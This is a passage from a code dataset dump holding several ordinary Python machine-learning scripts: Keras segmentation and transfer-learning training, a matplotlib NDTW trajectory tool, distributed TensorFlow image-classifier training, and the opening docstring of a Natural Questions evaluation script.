y_pred):\n return -dice_coef(y_true, y_pred)\n\n\ndef create_model():\n input = Input(shape=(1, img_rows, img_cols))\n \n conv1 = Convolution2D(32, 3, 3, border_mode='same', init='he_normal')(input)\n conv1 = LeakyReLU()(conv1)\n conv1 = SpatialDropout2D(0.2)(conv1)\n conv1 = Convolution2D(32, 3, 3, border_mode='same', init='he_normal')(conv1)\n conv1 = LeakyReLU()(conv1)\n conv1 = SpatialDropout2D(0.2)(conv1)\n pool1 = AveragePooling2D(pool_size=(2,2))(conv1)\n \n conv2 = Convolution2D(64, 3, 3, border_mode='same', init='he_normal')(pool1)\n conv2 = LeakyReLU()(conv2)\n conv2 = SpatialDropout2D(0.2)(conv2)\n conv2 = Convolution2D(64, 3, 3, border_mode='same', init='he_normal')(conv2)\n conv2 = LeakyReLU()(conv2)\n conv2 = SpatialDropout2D(0.2)(conv2)\n pool2 = AveragePooling2D(pool_size=(2,2))(conv2)\n \n conv3 = Convolution2D(128, 3, 3, border_mode='same', init='he_normal')(pool2)\n conv3 = LeakyReLU()(conv3)\n conv3 = SpatialDropout2D(0.2)(conv3)\n conv3 = Convolution2D(128, 3, 3, border_mode='same', init='he_normal')(conv3)\n conv3 = LeakyReLU()(conv3)\n conv3 = SpatialDropout2D(0.2)(conv3)\n \n comb1 = merge([conv2, UpSampling2D(size=(2,2))(conv3)], mode='concat', concat_axis=1)\n conv4 = Convolution2D(64, 3, 3, border_mode='same', init='he_normal')(comb1)\n conv4 = LeakyReLU()(conv4)\n conv4 = SpatialDropout2D(0.2)(conv4)\n conv4 = Convolution2D(64, 3, 3, border_mode='same', init='he_normal')(conv4)\n conv4 = LeakyReLU()(conv4)\n conv4 = SpatialDropout2D(0.2)(conv4)\n \n comb2 = merge([conv1, UpSampling2D(size=(2,2))(conv4)], mode='concat', concat_axis=1)\n conv5 = Convolution2D(32, 3, 3, border_mode='same', init='he_normal')(comb2)\n conv5 = LeakyReLU()(conv5)\n conv5 = SpatialDropout2D(0.2)(conv5)\n conv5 = Convolution2D(32, 3, 3, border_mode='same', init='he_normal')(conv5)\n conv5 = LeakyReLU()(conv5)\n conv5 = SpatialDropout2D(0.2)(conv5)\n \n output = Convolution2D(1, 1, 1, activation='sigmoid')(conv5)\n\n model = Model(input=input, output=output)\n model.compile(optimizer=Adam(lr=3e-4), loss='binary_crossentropy')\n return model\n\n\ndef preprocess(imgs):\n imgs_p = np.ndarray((imgs.shape[0], imgs.shape[1], img_rows, img_cols), dtype=np.uint8)\n for i in range(imgs.shape[0]):\n imgs_p[i, 0] = cv2.resize(imgs[i, 0], (img_cols, img_rows), interpolation=cv2.INTER_CUBIC)\n return imgs_p\n\n\ndef train_and_predict():\n print('-'*30)\n print('Loading and preprocessing train data...')\n print('-'*30)\n imgs_train, imgs_mask_train = load_train_data()\n\n imgs_train = preprocess(imgs_train)\n imgs_mask_train = preprocess(imgs_mask_train)\n\n imgs_train = imgs_train.astype('float32')\n mean = np.mean(imgs_train) # mean for data centering\n std = np.std(imgs_train) # std for data normalization\n\n imgs_train -= mean\n imgs_train /= std\n\n imgs_mask_train = imgs_mask_train.astype('float32')\n imgs_mask_train /= 255. # scale masks to [0, 1]\n\n print('-'*30)\n print('Creating and compiling model...')\n print('-'*30)\n model = create_model()\n\n print('-'*30)\n print('Building data augmentation object...')\n print('-'*30)\n datagen = ImageDataGenerator(\n rotation_range=15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n shear_range=0.15,\n horizontal_flip=True,\n vertical_flip=True)\n \n total = imgs_train.shape[0]\n img = []\n count = 0\n for batch in datagen.flow(imgs_train, batch_size=1, seed=1337):\n img.append(batch)\n count += 1\n if count > total*stack:\n break\n imgs_train = np.array(img)[:,0]\n\n mask = [] \n count = 0\n for batch in datagen.flow(imgs_mask_train, batch_size=1, seed=1337): \n mask.append(batch)\n count += 1\n if count > total*stack:\n break\n imgs_mask_train = np.array(mask)[:,0]\n \n callbacks = [\n EarlyStopping(monitor='loss', patience=5, verbose=0),\n ModelCheckpoint('weights.hdf5', monitor='loss', save_best_only=True)\n ]\n \n print('-'*30)\n print('Begin training...')\n print('-'*30)\n model.fit(imgs_train, imgs_mask_train, batch_size=4, nb_epoch=100, verbose=1, shuffle=True,\n callbacks=callbacks)\n\n print('-'*30)\n print('Loading and preprocessing test data...')\n print('-'*30)\n imgs_test = load_test_data()\n imgs_test = preprocess(imgs_test)\n\n imgs_test = imgs_test.astype('float32')\n imgs_test -= mean\n imgs_test /= std\n\n print('-'*30)\n print('Loading saved weights...')\n print('-'*30)\n model.load_weights('weights.hdf5')\n\n print('-'*30)\n print('Predicting masks on test data...')\n print('-'*30)\n imgs_mask_test = model.predict(imgs_test, verbose=1)\n np.save('imgs_mask_test.npy', imgs_mask_test)\n\n\nif __name__ == '__main__':\n train_and_predict()\n","repo_name":"gaudetcj/GlandSegmentation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5773,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"} +{"seq_id":"70742165203","text":"## Functions used in optimizing model hyperparameters\nimport os\nfrom time import perf_counter\nfrom utilities.io import Labels\nfrom build_model import *\n\nimport numpy as np\n\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.models import Model\nfrom keras.layers import InputLayer\nfrom keras.applications.resnet50 import ResNet50\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.xception import Xception\n\ndef stratified_train_val_test(y):\n \"\"\"\n Generate stratified train-val-test splits. \n Hard coded for 70-20-10 proportion\n \n Input:\n y - label array that train-val-test indices will be produced for\n\n Output:\n train - training set indices\n valid - validation set indices\n test - test set indices\n \"\"\"\n # Train-test split\n sss = StratifiedShuffleSplit(n_splits=1,test_size=.1)\n train, test = next(sss.split(y,y))\n \n # Train-validate split\n sss = StratifiedShuffleSplit(n_splits=1,test_size=2/9)\n train, valid = next(sss.split(y[train],y[train]))\n return train, valid, test\n\ndef subset_labels(indices,labels,chunksize,name):\n \"\"\"\n Subset a labels object and prepare it for reading bottleneck features.\n\n Create a Labels object from the input \"labels\" containing only\n the entries specified by \"indices\". The new Labels object's target is \n then set for bottleneck features and set to return numpy arrays.\n\n Input:\n indices - The indices for the data subset\n labels - The Labels object that will be subsetted\n chunksize - The chunksize to use when reading values from the subset\n name - The model name\n\n Output:\n sub_labels - Subsetted Labels object\n \"\"\"\n sub_labels = Labels(labels.labels.iloc[indices,:],\n labels.image_path_prefix, labels.n_images_loaded)\n sub_labels.set_data_target('bottleneck',chunksize,name)\n sub_labels.iter_df = False\n return sub_labels\n\ndef optimize_model(model, name, train_labels, valid_labels,\n max_epochs=5, pretrain_dense=False, load_trained=True):\n \"\"\"\n Optimize the supplied model with layers unfrozen at a variety of depths.\n\n The best model is tracked over epochs and the best one for both the \n output layer unfrozen and for any number of internal layers unfrozen\n is saved.\n\n Input:\n model - The keras Model to train\n name - The string to use for the model name\n train_labels - Labels object containing training data\n valid_labels - Labels object containing validation data\n max_epochs - The number of epochs to train each unfrozen non-output layer\n pretrain_dense - Train the output layer for extra iterations?\n load_trained - Use the previously saved weights as a starting point?\n\n Output:\n history_list - Training session history object\n\n Side Effect:\n Best models written to disk\n \"\"\"\n # Output layer gets tuned first\n refit_modelf = 'intermediates/saved_models/test_{}_tuned_out_layer.hdf5'.format(name)\n tuned_modelf = 'intermediates/saved_models/test_{}_base_weights.hdf5'.format(name)\n \n if load_trained and os.path.exists(refit_modelf):\n # Load pre-trained output layer weights\n model.load_weights(refit_modelf)\n\n history_list = []\n if pretrain_dense or not os.path.exists(refit_modelf):\n checkpointer = ModelCheckpoint(\n filepath=refit_modelf, \n verbose=1, save_best_only=True)\n unfreeze_model(model,1)\n \n history = model.fit_generator(train_labels,\n steps_per_epoch=train_labels.n_chunk,\n epochs=100,\n verbose=1,\n callbacks=[checkpointer],\n validation_data=valid_labels,\n validation_steps=valid_labels.n_chunk,\n )\n history_list.append(history)\n history_list.append(None) # Marks end of pretraining history\n\n # Use best weights found so far\n model.load_weights(refit_modelf)\n \n checkpointer = ModelCheckpoint(\n filepath=tuned_modelf, \n verbose=1, save_best_only=True)\n max_unfrozen = count_max_frozen(model)\n for i_unfrozen in range(2,max_unfrozen+1):\n unfreeze_model(model,i_unfrozen)\n \n history = model.fit_generator(train_labels,\n steps_per_epoch=train_labels.n_chunk,\n epochs=max_epochs,\n verbose=1,\n callbacks=[checkpointer],\n validation_data=valid_labels,\n validation_steps=valid_labels.n_chunk,\n )\n history_list.append(history)\n print('Model tuned with {} of {} layers unfrozen'\n .format(i_unfrozen,max_unfrozen))\n return history_list\n\ndef count_max_frozen(model):\n \"\"\"\n Counts the total number of layers in model that have weights\n \n Input:\n model - The model we want to count the layers of\n\n Output:\n freeze_count - The number of layers available to freeze\n \"\"\"\n freeze_count = 0\n for layer in model.layers:\n if layer.weights:\n freeze_count += 1\n return freeze_count\n\ndef unfreeze_model(model,n_unfrozen):\n \"\"\"\n Unfreeze from the output layer to n_unfrozen layers in.\n\n Done according to the order specified in model.layers\n only counting layers with weights. \n\n Input:\n model - The model that will have its layers unfrozen\n n_unfrozen - The number of layers to unfreeze\n\n Side Effect:\n n_unfrozen layers set to trainable\n \"\"\"\n i_unfrozen = 0\n for layer in model.layers[::-1]:\n if layer.weights:\n layer.trainable = True\n i_unfrozen += 1\n if i_unfrozen == n_unfrozen:\n break\n \ndef prep_model(model,max_layer,depth):\n \"\"\"\n Copy the last few layers of model and prepare the \n resulting model for training.\n\n Input:\n model - The model used as reference\n max_layer - Layer with this name has its output replaced with input layer\n depth - The number of model outputs\n\n Output:\n model_top - The top of model, capable of taking input and with a new\n output layer\n \"\"\"\n model_top = model_top_at_layer(model,max_layer)\n model_top = replace_out_layer(model_top,depth)\n for layer in model_top.layers:\n layer.trainable = False\n model_top.layers[-1].trainable = True\n model_top.compile('adam','categorical_crossentropy',metrics=['accuracy'])\n return model_top\n\ndef expand_labels(labels):\n \"\"\"\n Prepare labels to read flipped bottleneck features and train.\n\n Input:\n labels - Labels object with only base image paths\n\n Output:\n labels - Labels object with flipped image paths added and OHE targets\n \"\"\"\n # Append paths to flipped image bottleneck features\n flip_labels = labels.labels.copy()\n flip_labels['image_name'] = flip_labels['image_name'].apply(\n lambda x: '_flip' + x)\n flip_labels = Labels(flip_labels,image_path_prefix,labels.n_images_loaded)\n labels = labels + flip_labels\n \n labels.one_hot_labels()\n return labels\n\ndef train_model(labels, chunksize):\n \"\"\"\n Train the models specified by models_to_run on the images \n supplied in labels. Model weights saved to disk. \n\n Input:\n labels - Labels object containing references to data to train on\n chunksize - The number of images to train on at a time\n\n Output:\n hist_dict - Maps model name to its training history\n \"\"\"\n labels = expand_labels(labels)\n hist_dict = {}\n train, valid, test = stratified_train_val_test(\n np.stack(labels.labels['category_label'].values))\n \n max_layer_dict = {\n 'resnet' : 'activation_46',\n 'inception_v3' : 'mixed9',\n 'xception' : 'add_28',\n }\n\n model_dict = {\n 'resnet' : ResNet50(weights='imagenet'),\n 'inception_v3' : InceptionV3(weights='imagenet'),\n 'xception' : Xception(weights='imagenet'),\n }\n\n models_to_run = [\n # 'resnet', \n # 'inception_v3',\n 'xception',\n ]\n for name in models_to_run:\n print('Fine tuning {} model'.format(name))\n model = model_dict[name]\n max_layer = max_layer_dict[name]\n model_top = prep_model(model,max_layer,depth=10)\n \n train_labels = subset_labels(train,labels,chunksize,name)\n valid_labels = subset_labels(valid,labels,chunksize,name)\n \n start = perf_counter()\n hist_dict[name] = optimize_model(model_top,name,train_labels,\n valid_labels,\n pretrain_dense=True, load_trained=True)\n print('Took {} seconds to optimize all layers for {}'\n .format(perf_counter() - start,name))\n return hist_dict\n\n\nif __name__ == '__main__':\n ## Train the top of the model on the selected labels\n np.random.seed(313) # For reproducibility\n \n chunksize = 3000\n n_images_loaded = 150 # -1 loads all\n image_to_category = 'data/Category and Attribute Prediction Benchmark' \\\n '/Anno/list_category_img.txt'\n image_path_prefix = 'data/Category and Attribute Prediction Benchmark' \\\n '/Img/Img/'\n labels = Labels(image_to_category, image_path_prefix, n_images_loaded)\n\n hist_dict = train_model(labels, chunksize)\n","repo_name":"magee256/clothing_object_recognition","sub_path":"classifier/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":9481,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"18021370507","text":"import math\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.backend_bases import MouseEvent\nfrom matplotlib.widgets import Slider\n\nfrom cdtw import compute_uniform_cdtw, interpolate_trajectory, compute_ndtw\n\n\nclass NDTWPlayground(object):\n u\"\"\" Matplotlib Draggable Points base from https://github.com/yuma-m/matplotlib-draggable-plot \"\"\"\n\n def __init__(self):\n self._figure, self._axes, self.__line = None, None, [None, None]\n self._dragging_point = None\n self.__points = [{}, {}]\n self._selected_plot = 0\n self._colors = ['b', 'r']\n self.npts = 50\n self.sdist = 10\n\n self._init_plot()\n\n def _init_plot(self):\n self._figure = plt.figure(\"Draw plot\")\n axes = self._figure.add_axes([0.075, 0.25, 0.85, 0.70])\n axes.set_xlim(0, 100)\n axes.set_ylim(0, 100)\n axes.grid(which=\"both\")\n self._axes = axes\n\n self._figure.canvas.mpl_connect('button_press_event', self._on_click)\n self._figure.canvas.mpl_connect('button_release_event', self._on_release)\n self._figure.canvas.mpl_connect('motion_notify_event', self._on_motion)\n self._figure.canvas.mpl_connect('key_press_event', self._on_keypress)\n\n self.npts_slider_ax = self._figure.add_axes([0.25, 0.15, 0.65, 0.03])\n self.npts_slider = Slider(self.npts_slider_ax, 'Num Points', 0, 500, valinit=self.npts, valstep=10)\n self.npts_slider.on_changed(self.npts_changed)\n\n self.sdist_slider_ax = self._figure.add_axes([0.25, 0.10, 0.65, 0.03])\n self.sdist_slider = Slider(self.sdist_slider_ax, 'Success dist', 0, 100, valinit=self.sdist, valstep=5)\n self.sdist_slider.on_changed(self.sdist_changed)\n plt.show()\n\n @property\n def _points(self):\n return self.__points[self._selected_plot]\n\n @property\n def _line(self):\n return self.__line[self._selected_plot]\n\n @_line.setter\n def _line(self, a):\n self.__line[self._selected_plot] = a\n\n def npts_changed(self, val):\n self.npts = val\n self._update_plot()\n\n def sdist_changed(self, val):\n self.sdist = val\n self._update_plot()\n\n def show_ndtw(self):\n if not (len(self.__points[0].items()) > 1 and len(self.__points[1].items()) > 1):\n return\n path1 = list(sorted(self.__points[0].items()))\n path2 = list(sorted(self.__points[1].items()))\n\n if self.npts > 0:\n ndtw, dtw = compute_uniform_cdtw(path1, path2, self.sdist, self.npts, return_dtw=True)\n else:\n ndtw, dtw = compute_ndtw(path1, path2, self.sdist, return_dtw=True)\n\n self._figure.suptitle(f'NDTW = {ndtw}; DTW = {dtw}')\n\n def _on_keypress(self, event):\n if event.key == 'enter':\n path1 = list(sorted(self.__points[0].items()))\n path2 = list(sorted(self.__points[1].items()))\n\n ndtw = compute_uniform_cdtw(path1, path2, self.sdist, self.npts)\n ap1 = list(interpolate_trajectory(path1, self.npts))\n ap2 = list(interpolate_trajectory(path2, self.npts))\n\n self.__line[0].set_data(*list(zip(*ap1)))\n self.__line[1].set_data(*list(zip(*ap2)))\n self.show_ndtw()\n self._figure.canvas.draw()\n print(ndtw)\n elif event.key == 'tab':\n self._selected_plot = (self._selected_plot + 1) % 2\n elif event.key == 'c':\n self._figure.clear()\n self.__init__()\n\n def _update_plot(self):\n tmp = self._selected_plot\n for i, points in enumerate(self.__points):\n self._selected_plot = i\n if not len(points):\n continue\n x, y = zip(*sorted(points.items()))\n # Add new plot\n if not self._line:\n self._line, = self._axes.plot(x, y, color=self._colors[i], marker=\"o\", markersize=10)\n # Update current plot\n else:\n self._line.set_data(x, y)\n self._selected_plot = tmp\n self.show_ndtw()\n self._figure.canvas.draw()\n\n def _add_point(self, x, y=None):\n if isinstance(x, MouseEvent):\n x, y = int(x.xdata), int(x.ydata)\n self._points[x] = y\n return x, y\n\n def _remove_point(self, x, _):\n if x in self._points:\n self._points.pop(x)\n\n def _find_neighbor_point(self, event):\n u\"\"\" Find point around mouse position\n :rtype: ((int, int)|None)\n :return: (x, y) if there are any point around mouse else None\n \"\"\"\n distance_threshold = 3.0\n nearest_point = None\n min_distance = math.sqrt(2 * (100 ** 2))\n for x, y in self._points.items():\n distance = math.hypot(event.xdata - x, event.ydata - y)\n if distance < min_distance:\n min_distance = distance\n nearest_point = (x, y)\n if min_distance < distance_threshold:\n return nearest_point\n return None\n\n def _on_click(self, event):\n u\"\"\" callback method for mouse click event\n :type event: MouseEvent\n \"\"\"\n # left click\n if event.button == 1 and event.inaxes in [self._axes]:\n point = self._find_neighbor_point(event)\n if point:\n self._dragging_point = point\n else:\n self._add_point(event)\n self._update_plot()\n # right click\n elif event.button == 3 and event.inaxes in [self._axes]:\n point = self._find_neighbor_point(event)\n if point:\n self._remove_point(*point)\n self._update_plot()\n\n def _on_release(self, event):\n u\"\"\" callback method for mouse release event\n :type event: MouseEvent\n \"\"\"\n if event.button == 1 and event.inaxes in [self._axes] and self._dragging_point:\n self._dragging_point = None\n self._update_plot()\n\n def _on_motion(self, event):\n u\"\"\" callback method for mouse motion event\n :type event: MouseEvent\n \"\"\"\n if not self._dragging_point:\n return\n if event.xdata is None or event.ydata is None:\n return\n self._remove_point(*self._dragging_point)\n self._dragging_point = self._add_point(event)\n self._update_plot()\n\n\nif __name__ == \"__main__\":\n plot = NDTWPlayground()\n","repo_name":"pranav-putta/ndtw_playground","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20744325698","text":"from __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport tf_parameter_mgr\r\nimport monitor_cb\r\nfrom monitor_cb import CMonitor\r\n\r\n\r\nfrom datetime import datetime\r\nimport os.path\r\nimport time\r\nimport sys\r\nimport glob\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom preprocessing import preprocessing_factory\r\nfrom nets import nets_factory\r\nfrom tensorflow.python.ops import variables\r\n# Choose your image preprocessing\r\ntf.app.flags.DEFINE_string('preprocessing_type', 'cifarnet', 'image processing type')\r\n# Choose the network structure\r\ntf.app.flags.DEFINE_string('network_type', 'cifarnet', 'image feature extraction network type')\r\n# Set the number of classes\r\ntf.app.flags.DEFINE_integer('number_classes', 10, 'number of classes')\r\n\r\ntf.app.flags.DEFINE_string('weights', '', 'initialize with pretrained model weights')\r\n\r\ntf.app.flags.DEFINE_string('train_dir', 'train/',\r\n \"\"\"Directory where to write event logs \"\"\"\r\n \"\"\"and checkpoint.\"\"\")\r\ntf.app.flags.DEFINE_integer('test_interval', 32, 'test_interval')\r\ntf.app.flags.DEFINE_integer('eval_topk', 1, 'accuracy of evaluation of top-k')\r\n\r\n# Parameters for distributed training, no need to modify\r\ntf.app.flags.DEFINE_string('job_name', '', 'One of \"ps\", \"worker\"')\r\ntf.app.flags.DEFINE_string('ps_hosts', '',\r\n \"\"\"Comma-separated list of hostname:port for the \"\"\"\r\n \"\"\"parameter server jobs. e.g. \"\"\"\r\n \"\"\"'machine1:2222,machine2:1111,machine2:2222'\"\"\")\r\n\r\ntf.app.flags.DEFINE_string('worker_hosts', '',\r\n \"\"\"Comma-separated list of hostname:port for the \"\"\"\r\n \"\"\"worker jobs. e.g. \"\"\"\r\n \"\"\"'machine1:2222,machine2:1111,machine2:2222'\"\"\")\r\n\r\ntf.app.flags.DEFINE_integer('task_id', 0, 'Task ID of the worker/replica running the training.')\r\ntf.app.flags.DEFINE_bool('log_device_placement', False, 'log_device_placement')\r\n\r\nFLAGS = tf.app.flags.FLAGS\r\nFLAGS.batch_size = tf_parameter_mgr.getTrainBatchSize()\r\n\r\ndef get_train_op(total_loss, global_step, return_grad=False):\r\n lr = tf_parameter_mgr.getLearningRate(global_step)\r\n # Compute gradients.\r\n opt = tf_parameter_mgr.getOptimizer(lr)\r\n grads = opt.compute_gradients(total_loss)\r\n # Apply gradients.\r\n apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)\r\n with tf.control_dependencies([apply_gradient_op] + tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\r\n train_op = tf.no_op(name='train')\r\n if return_grad:\r\n return apply_gradient_op, grads\r\n return train_op\r\n\r\ndef get_loss(logits, labels):\r\n # Calculate the average cross entropy loss across the batch.\r\n labels = tf.cast(labels, tf.int64)\r\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\r\n labels=labels, logits=logits, name='cross_entropy_per_example')\r\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\r\n tf.add_to_collection('losses', cross_entropy_mean)\r\n # The total loss is defined as the cross entropy loss plus all of the weight\r\n # decay terms (L2 loss).\r\n total_loss = tf.add_n(tf.get_collection('losses'), name='total_loss')\r\n return total_loss\r\n\r\ndef get_accuracy(logits, labels):\r\n top_k_op = tf.nn.in_top_k(logits, labels, FLAGS.eval_topk)\r\n correct = np.sum(top_k_op)\r\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\r\n return accuracy\r\n\r\n\r\ndef get_data(is_train=True):\r\n batch_size = FLAGS.batch_size\r\n if is_train:\r\n filenames = tf_parameter_mgr.getTrainData()\r\n else:\r\n filenames = tf_parameter_mgr.getTestData()\r\n\r\n filename_queue = tf.train.string_input_producer(filenames)\r\n\r\n reader = tf.TFRecordReader()\r\n _, serialized_example = reader.read(filename_queue)\r\n\r\n features = tf.parse_single_example(serialized_example,\r\n features={\r\n 'height': tf.FixedLenFeature([], tf.int64),\r\n 'width': tf.FixedLenFeature([], tf.int64),\r\n 'depth': tf.FixedLenFeature([], tf.int64),\r\n 'label': tf.FixedLenFeature([], tf.int64),\r\n 'image_raw': tf.FixedLenFeature([], tf.string),\r\n })\r\n label = features['label']\r\n image = tf.decode_raw(features['image_raw'], tf.uint8)\r\n height = tf.cast(features['height'], tf.int32)\r\n width = tf.cast(features['width'], tf.int32)\r\n depth = tf.cast(features['depth'], tf.int32)\r\n image = tf.reshape(image, tf.stack([height, width, depth]))\r\n\r\n preprocessing_type = FLAGS.preprocessing_type\r\n preprocessor = preprocessing_factory.get_preprocessing(preprocessing_type, is_training=is_train)\r\n network_type = FLAGS.network_type\r\n default_size = nets_factory.get_default_size(network_type)\r\n image = preprocessor(image, output_height=default_size, output_width=default_size)\r\n image.set_shape([default_size, default_size, 3])\r\n\r\n image_batch, label_batch = tf.train.batch([image, label], batch_size=batch_size, num_threads=4, capacity=32)\r\n return image_batch, label_batch\r\n\r\n\r\ndef train():\r\n ps_hosts = FLAGS.ps_hosts.split(',')\r\n worker_hosts = FLAGS.worker_hosts.split(',')\r\n print('Ps hosts are: %s' % ps_hosts)\r\n print('Worker hosts are: %s' % worker_hosts)\r\n\r\n cluster = tf.train.ClusterSpec({\"ps\": ps_hosts, \"worker\": worker_hosts})\r\n\r\n server = tf.train.Server(\r\n cluster,\r\n job_name=FLAGS.job_name,\r\n task_index=FLAGS.task_id)\r\n\r\n if FLAGS.job_name == 'ps':\r\n server.join()\r\n\r\n is_chief = (FLAGS.task_id == 0)\r\n\r\n with tf.device(tf.train.replica_device_setter(\r\n worker_device=\"/job:worker/task:%d\" % FLAGS.task_id,\r\n cluster=cluster)):\r\n global_step = tf.contrib.framework.get_or_create_global_step()\r\n is_training = tf.placeholder_with_default(False, shape=[])\r\n i_train, l_train = get_data(is_train=True)\r\n i_test, l_test = get_data(is_train=False)\r\n images, labels = tf.cond(is_training, lambda: (i_train, l_train), lambda: (i_test, l_test))\r\n network_type = FLAGS.network_type\r\n embedding_network = nets_factory.get_network_fn(network_type, num_classes=FLAGS.number_classes,\r\n is_training=is_training)\r\n logits, end_points = embedding_network(images)\r\n total_loss = get_loss(logits, labels)\r\n accuracy = get_accuracy(logits, labels)\r\n train_op = get_train_op(total_loss, global_step)\r\n # setup MAO and Tensorboard monitoring\r\n print('FLAGS.train_dir', FLAGS.train_dir)\r\n log_dir = os.path.join(FLAGS.train_dir, 'log')\r\n # graph = tf.get_default_graph()\r\n monitor = CMonitor(log_dir, tf_parameter_mgr.getTestInterval(), tf_parameter_mgr.getMaxSteps())\r\n monitor.SummaryScalar('train accuracy', accuracy)\r\n monitor.SummaryScalar('test accuracy', accuracy)\r\n \r\n monitor.SummaryScalar('train loss', total_loss)\r\n monitor.SummaryScalar('test loss', total_loss)\r\n\r\n # if is_chief:\r\n # graph = tf.get_default_graph()\r\n # all_ops = graph.get_operations()\r\n # for op in all_ops:\r\n # if op.type == 'VariableV2':\r\n # output_tensor = graph.get_tensor_by_name(op.name + ':0')\r\n # if op.name.endswith('/weights'):\r\n # monitor.SummaryHist(\"weight\", output_tensor, op.name.replace('/',''))\r\n # monitor.SummaryNorm2(\"weight\", output_tensor, op.name.replace('/',''))\r\n # elif op.name.endswith('/biases'):\r\n # monitor.SummaryHist(\"bias\", output_tensor, op.name.replace('/',''))\r\n # elif op.type == 'Relu':\r\n # output_tensor = graph.get_tensor_by_name(op.name + ':0')\r\n # monitor.SummaryHist(\"activation\", output_tensor, op.name.replace('/',''))\r\n # monitor.SummaryGradient('weight', total_loss)\r\n # monitor.SummaryGradient('bias', total_loss)\r\n # monitor.SummaryGWRatio()\r\n\r\n train_summary = tf.summary.merge_all(monitor_cb.DLMAO_TRAIN_SUMMARIES)\r\n test_summary = tf.summary.merge_all(monitor_cb.DLMAO_TEST_SUMMARIES)\r\n summaryWriter = tf.summary.FileWriter(log_dir)\r\n\r\n class _LoggerHook(tf.train.SessionRunHook):\r\n def begin(self):\r\n self._next_trigger_step = FLAGS.test_interval\r\n self._trigger = True\r\n\r\n def before_run(self, run_context):\r\n args = {'global_step': global_step}\r\n if self._trigger:\r\n args['train_summary'] = train_summary\r\n\r\n return tf.train.SessionRunArgs(args)\r\n\r\n def after_run(self, run_context, run_values):\r\n gs = run_values.results['global_step']\r\n if self._trigger:\r\n self._trigger = False\r\n summaryWriter.add_summary(run_values.results['train_summary'], gs)\r\n summary = run_context.session.run(test_summary, feed_dict={is_training: False})\r\n summaryWriter.add_summary(summary, gs)\r\n summaryWriter.flush()\r\n if gs >= self._next_trigger_step:\r\n self._next_trigger_step += FLAGS.test_interval\r\n self._trigger = True\r\n\r\n\r\n hooks = [tf.train.StopAtStepHook(last_step=tf_parameter_mgr.getMaxSteps()),\r\n tf.train.NanTensorHook(total_loss)]\r\n\r\n if is_chief:\r\n hooks.append(_LoggerHook())\r\n\r\n pretrained_model = FLAGS.weights\r\n variables_saved = variables._all_saveable_objects()\r\n print(\"Variables stored in the model:\")\r\n variables_to_restore = []\r\n for var in variables_saved:\r\n if var.op.name.startswith('global_step') or var.op.name.startswith('InceptionV3/Logits'):\r\n print('remove', var.op.name, var.op)\r\n continue\r\n else:\r\n variables_to_restore.append(var)\r\n\r\n print(\"------------------------------\")\r\n print('will restore ', variables_to_restore)\r\n saver = tf.train.Saver(var_list=variables_to_restore)\r\n\r\n with tf.train.MonitoredTrainingSession(master=server.target, is_chief=is_chief, checkpoint_dir=FLAGS.train_dir, hooks=hooks,\r\n config=tf.ConfigProto(log_device_placement=FLAGS.log_device_placement), save_summaries_steps=None, save_summaries_secs=None) as mon_sess:\r\n if pretrained_model != None:\r\n ckpt = tf.train.get_checkpoint_state(pretrained_model)\r\n print(\"Restore pre-trained checkpoint:\", ckpt)\r\n if ckpt and ckpt.model_checkpoint_path:\r\n saver.restore(mon_sess, ckpt.model_checkpoint_path)\r\n print(\"Successfully restore checkpoint:\", ckpt.model_checkpoint_path)\r\n else:\r\n files = os.listdir(pretrained_model)\r\n for f in files:\r\n if f.endswith('ckpt'):\r\n model_checkpoint_path = pretrained_model+\"/\"+f\r\n try:\r\n saver.restore(mon_sess, model_checkpoint_path)\r\n print(\"Successfully restore checkpoint:\", model_checkpoint_path)\r\n except Exception as e:\r\n print(\"Fail to restore \",model_checkpoint_path,'with message',e)\r\n break\r\n steps = 0\r\n\r\n while not mon_sess.should_stop():\r\n mon_sess.run(train_op, feed_dict={is_training: True})\r\n steps += 1\r\n if steps % 100 == 0: print('%d stpes executed on worker %d.' % (steps, FLAGS.task_id))\r\n print('%d stpes executed on worker %d.' % (steps, FLAGS.task_id))\r\n\r\ndef main(argv=None):\r\n train()\r\n\r\nif __name__ == '__main__':\r\n tf.app.run()\r\n","repo_name":"apollos/mytoolkits","sub_path":"models/GuidelineOfTensorflowModel/classification_src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"39269430263","text":"r\"\"\"Official evaluation script for Natural Questions.\n\n https://ai.google.com/research/NaturalQuestions\n\n ------------------------------------------------------------------------------\n\n Example usage:\n\n nq_eval --gold_path=<path-to-gold-files> --predictions_path=<path_to_json>\n\n This will compute both the official F1 scores as well as recall@precision\n tables for both long and short answers. Note that R@P are only meaningful\n if your model populates the score fields of the prediction JSON format.\n\n gold_path should point to the five way annotated dev data in the\n original download format (gzipped jsonlines).\n\n predictions_path should point to a json file containing the predictions in\n the format given below.\n\n ------------------------------------------------------------------------------\n\n Prediction format:\n\n {'predictions': [\n {\n 'example_id': -2226525965842375672,\n 'long_answer': {\n 'start_byte': 62657, 'end_byte': 64776,\n 'start_token': 391, 'end_token': 604\n },\n 'long_answer_score': 13.5,\n 'short_answers': [\n {'start_byte': 64206, 'end_byte': 64280,\n 'start_token': 555, 'end_token': 560}, ...],\n 'short_answers_score': 26.4,\n 'yes_no_answer': 'NONE'\n }, ... ]\n }\n\n The prediction format mirrors the annotation format in defining each long 